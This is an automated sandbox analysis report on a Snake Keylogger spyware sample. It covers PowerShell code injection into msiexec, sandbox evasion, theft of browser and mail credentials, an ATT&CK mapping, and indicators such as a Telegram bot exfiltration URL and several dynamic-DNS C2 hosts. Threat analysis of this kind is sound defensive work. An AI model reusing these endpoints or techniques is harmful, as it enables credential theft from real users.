          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594360s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594235s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -594110s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -593985s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096 | Thread sleep time: -593860s >= -30000s
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_00406033 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599875
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599766
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599657
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599532
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599407
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599282
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599157
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599032
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598919
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598804
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598668
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598562
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598447
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598344
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598234
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598125
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598016
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597907
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597782
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597672
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597563
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597438
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597313
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597188
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597063
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596949
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596844
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596719
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596610
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596485
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596360
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596238
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596110
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595985
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595797
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595667
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595449
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595344
          Source: C:\Users\user\Desktop\Rundholterne89.exe | API call chain: ExitProcess graph end node | graph_0-3316
          Source: C:\Users\user\Desktop\Rundholterne89.exe | API call chain: ExitProcess graph end node | graph_0-3164
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_002ED044 LdrInitializeThunk,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3F40000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Rundholterne89.exe | Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

          Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6624, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the signature-count badge the report shows for that cell, kept as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 311 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 File and Directory Discovery; 14 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 1539382; Sample: Rundholterne89.exe; Start date: 22/10/2024; Architecture: WINDOWS; Score: 100)

Contacted hosts: reallyfreegeoip.org; api.telegram.org; 5 other IPs or domains
Top-level signatures: Found malware configuration; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 6 other signatures
Host-linked signatures: reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP); api.telegram.org: Uses the Telegram API (likely for C&C communication)

Process tree (the bracketed numbers are the per-process counters drawn next to each node, see the legend above):
Rundholterne89.exe [34], started
    Dropped: C:\Users\user\AppData\...xungulate.Spe205 (ASCII)
    Signatures: Suspicious powershell command line found
    -> powershell.exe [27], started
        Dropped: C:\Users\user\AppData\...\Rundholterne89.exe (PE32); C:\...\Rundholterne89.exe:Zone.Identifier (ASCII)
        Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
        -> msiexec.exe [15 8], started
            Network: api.telegram.org 149.154.167.220 (ports 443, 49728), TELEGRAMRU, United Kingdom; smtp.ionos.es 213.165.67.118 (ports 49729, 587), ONEANDONE-ASBrauerstrasse48DE, Germany; 4 other IPs or domains
            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
        -> conhost.exe, started

Antivirus detection, initial sample (Source | Detection | Scanner | Label):
Rundholterne89.exe | 42% | ReversingLabs | Win32.Spyware.Snakekeylogger
Rundholterne89.exe | 100% | Avira | TR/AVI.Inj.npwdo

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe | 100% | Avira | TR/AVI.Inj.npwdo
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe | 42% | ReversingLabs | Win32.Spyware.Snakekeylogger

No Antivirus matches

No Antivirus matches

URL reputation (Source | Detection | Scanner | Label):
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_Error | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
https://apis.google.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
drive.google.com | 142.250.185.174 | true | false | | unknown
drive.usercontent.google.com | 142.250.186.65 | true | false | | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
smtp.ionos.es | 213.165.67.118 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://reallyfreegeoip.org/xml/173.254.250.76 | false | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
https://reallyfreegeoip.org/xml/173.254.250.76$ | msiexec.exe, 00000006.00000002.2625379700.0000000023287000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.office.com/ | msiexec.exe, 00000006.00000002.2625379700.00000000233FF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20a | msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/lB | msiexec.exe, 00000006.00000002.2625379700.00000000233FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000002.2603668887.00000000006AC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | Rundholterne89.exe, Rundholterne89.exe.2.dr | false | URL Reputation: safe | unknown
http://smtp.ionos.es | msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000006.00000002.2625379700.00000000233CE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://aborters.duckdns.org:8081 | msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_Error | Rundholterne89.exe, Rundholterne89.exe.2.dr | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/ | msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | msiexec.exe, 00000006.00000002.2625379700.00000000233C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org | msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/l | msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://apis.google.com | msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
142.250.185.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
213.165.67.118 | smtp.ionos.es | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
142.250.186.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539382
Start date and time: 2024-10-22 16:02:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Rundholterne89.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/14@6/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 136
• Number of non-executed functions: 41
Cookbook Comments:
